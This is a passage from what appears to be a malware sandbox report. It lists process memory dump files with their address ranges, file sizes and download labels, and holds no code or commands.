                          • memory/1344-176-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-172-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-179-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-178-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-181-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-177-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-182-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-180-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-170-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1344-171-0x00000267B9220000-0x00000267B9221000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/1916-199-0x0000023DC5F10000-0x0000023DC5F2E000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/1916-158-0x0000023DC3910000-0x0000023DC3932000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/1916-169-0x0000023DC5F50000-0x0000023DC5FC6000-memory.dmp

                            Filesize

                            472KB

                            Download

                          • memory/1916-168-0x0000023DC39B0000-0x0000023DC39F4000-memory.dmp

                            Filesize

                            272KB

                            Download

                          • memory/2808-228-0x0000000004DA0000-0x0000000004E3C000-memory.dmp

                            Filesize

                            624KB

                            Download

                          • memory/2808-241-0x0000000005BC0000-0x0000000005D66000-memory.dmp

                            Filesize

                            1.6MB

                            Download

                          • memory/2808-227-0x0000000000510000-0x0000000000544000-memory.dmp

                            Filesize

                            208KB

                            Download

                          • memory/2808-232-0x0000000005460000-0x0000000005A04000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/2808-240-0x0000000004FF0000-0x0000000005046000-memory.dmp

                            Filesize

                            344KB

                            Download

                          • memory/2808-239-0x0000000004E80000-0x0000000004E8A000-memory.dmp

                            Filesize

                            40KB

                            Download

                          • memory/2808-234-0x0000000004F50000-0x0000000004FE2000-memory.dmp

                            Filesize

                            584KB

                            Download

                          • memory/3508-359-0x000001F400060000-0x000001F40009A000-memory.dmp

                            Filesize

                            232KB

                            Download

                          • memory/3508-245-0x000001F462B90000-0x000001F463880000-memory.dmp

                            Filesize

                            12.9MB

                            Download

                          • memory/3508-304-0x000001F47DC80000-0x000001F47DCF6000-memory.dmp

                            Filesize

                            472KB

                            Download

                          • memory/3508-293-0x000001F47DE50000-0x000001F47E5D6000-memory.dmp

                            Filesize

                            7.5MB

                            Download

                          • memory/3508-348-0x000001F400810000-0x000001F4008CC000-memory.dmp

                            Filesize

                            752KB

                            Download

                          • memory/3508-358-0x000001F400040000-0x000001F400058000-memory.dmp

                            Filesize

                            96KB

                            Download

                          • memory/3508-380-0x000001F400B50000-0x000001F400B9A000-memory.dmp

                            Filesize

                            296KB

                            Download

                          • memory/3508-390-0x000001F400BA0000-0x000001F400C30000-memory.dmp

                            Filesize

                            576KB

                            Download

                          • memory/3508-360-0x000001F4008D0000-0x000001F400950000-memory.dmp

                            Filesize

                            512KB

                            Download

                          • memory/3584-1050-0x000000001D0B0000-0x000000001D14C000-memory.dmp

                            Filesize

                            624KB

                            Download

                          • memory/3584-233-0x000000001C770000-0x000000001C816000-memory.dmp

                            Filesize

                            664KB

                            Download

                          • memory/3584-229-0x000000001C2A0000-0x000000001C76E000-memory.dmp

                            Filesize

                            4.8MB

                            Download

                          • memory/3584-236-0x000000001C890000-0x000000001C8F2000-memory.dmp

                            Filesize

                            392KB

                            Download

                          • memory/4180-238-0x00000000001E0000-0x00000000002AE000-memory.dmp

                            Filesize

                            824KB

                            Download

                          • memory/4180-4406-0x00000000061E0000-0x00000000061E6000-memory.dmp

                            Filesize

                            24KB

                            Download

                          • memory/4180-2024-0x0000000006350000-0x0000000006372000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4180-4405-0x0000000006180000-0x0000000006194000-memory.dmp

                            Filesize

                            80KB

                            Download

                          • memory/4352-209-0x00000000007C0000-0x000000000085E000-memory.dmp

                            Filesize

                            632KB

                            Download

                          • memory/5016-1824-0x0000000000400000-0x000000000045F000-memory.dmp

                            Filesize

                            380KB

                            Download

                          • memory/5016-1825-0x00000000005F0000-0x0000000000607000-memory.dmp

                            Filesize

                            92KB

                            Download

                          • memory/5716-905-0x0000000002020000-0x000000000203C000-memory.dmp

                            Filesize

                            112KB

                            Download

                          • memory/5716-1049-0x0000000005070000-0x00000000050D6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/5716-978-0x00000000023F0000-0x000000000240A000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/5736-1932-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/5736-1392-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/5928-1290-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/5928-1394-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/6044-1413-0x0000000000400000-0x00000000005BB000-memory.dmp

                            Filesize

                            1.7MB

                            Download

                          • memory/6044-2558-0x0000000000400000-0x00000000005BB000-memory.dmp

                            Filesize

                            1.7MB

                            Download

                          • memory/6092-1957-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/6092-2997-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/6092-3951-0x0000000000400000-0x0000000000533000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/6800-4410-0x0000000000400000-0x000000000043C000-memory.dmp

                            Filesize

                            240KB

                            Download

                          • memory/6800-4417-0x0000000005840000-0x0000000005858000-memory.dmp

                            Filesize

                            96KB

                            Download

                          • memory/6800-4439-0x0000000005410000-0x0000000005460000-memory.dmp

                            Filesize

                            320KB

                            Download

                          • memory/7616-4412-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-2028-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-2026-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-4415-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-3937-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-4414-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-4416-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-3935-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-4420-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7616-3936-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7816-1786-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7816-1994-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download

                          • memory/7816-1787-0x0000000000400000-0x0000000000537000-memory.dmp

                            Filesize

                            1.2MB

                            Download